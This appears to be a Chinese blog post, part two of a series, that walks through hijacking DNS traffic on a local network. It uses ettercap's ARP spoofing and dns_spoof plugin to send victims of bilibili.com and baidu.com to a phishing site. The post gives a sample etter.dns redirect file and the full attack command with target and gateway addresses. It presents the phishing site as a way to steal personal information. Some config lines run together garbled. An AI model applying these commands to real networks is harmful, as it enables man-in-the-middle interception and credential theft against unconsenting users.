一 网络安全主动进攻之DNS基础和ettercap实现DNS流量劫持( 二 )


  1. 搭建假的DNS Server提供可以自定义DNS解析条件 , 基于ettrcap使用自带的/etc/ettercap/etter.dns 。
  2. 搭建假的钓鱼网站,其IP由假的DNS服务器提供,当然也可以搭建某些中转的网站,比如某个编写了恶意脚本的站点,用户打开后GET 其URL,再执行脚本后跳转 。(相比于近似发,taobao.com和ta0ba0.com,DNS可以让正确的域名对于错误的站点,更隐蔽)
  3. 部署站点:
    • ettercap的基于可arp来实现的,所以只在局域网中使用,用于 。
    • 钓鱼网站站点可以搭建在局域网内也可以搭建在公网中 , 具体内容和作用嘛,其实应该有看见过,用于盗取一些个人信息;配置使用nginx、apache作为中间价 , PHP之类作为解析(或者静态的html,post到动态PHP界面)
  4. 使用ettercap发起攻击
ettercap的使用ettercap是基于ARP 地址欺骗来实现中间人攻击的工具 。
可恶我的kali截图丢了,后面我会补上 。
一般情况下完整版的Kali是自带甚至有图形界面,
  • github:https://github.com/Ettercap/ettercap
  • 官网:Downloads ? Ettercap (ettercap-project.org)
编辑(假DNS请求)/etc/ettercap/etter.dns# 域名A钓鱼网站IP# 比如# 正向Awww.bilibili.comA10.100.10.4www.baidu.comA10.100.10.4# 反向PRTwww.bilibili.comPRT10.100.10.4www.baidu.comPRT10.100.10.4发起攻击过程# 查看网关 网卡等root @ localhost in ~ [21:54:10] C:1$ sudo route -nKernel IP routing tableDestination Gateway Genmask Flags Metric Ref Use Iface10.100.10.1 0.0.0.0 255.255.255.192 U 0 0 0 wlan0---
ettercap -i wlan0 -Tq -M arp:remote -P dns_spoof /被攻击者ip// /被攻击者网关//-i <网卡>:指定网卡-T:只显示文本-q:安静模式,不显示抓到的数据包内容-M <攻击方式>:执行中间人攻击,这里的arp:remote为arp欺骗-P <插件名>:使用的插件 , 这里使用dns_spoof即可dns欺骗插件ettercap -i wlan0 -Tq -M arp:remote -P dns_spoof /10.100.10.120// /10.100.10.1//--
今天先写这么多啦,好困啊 , 今天早点休息吧 。

推荐阅读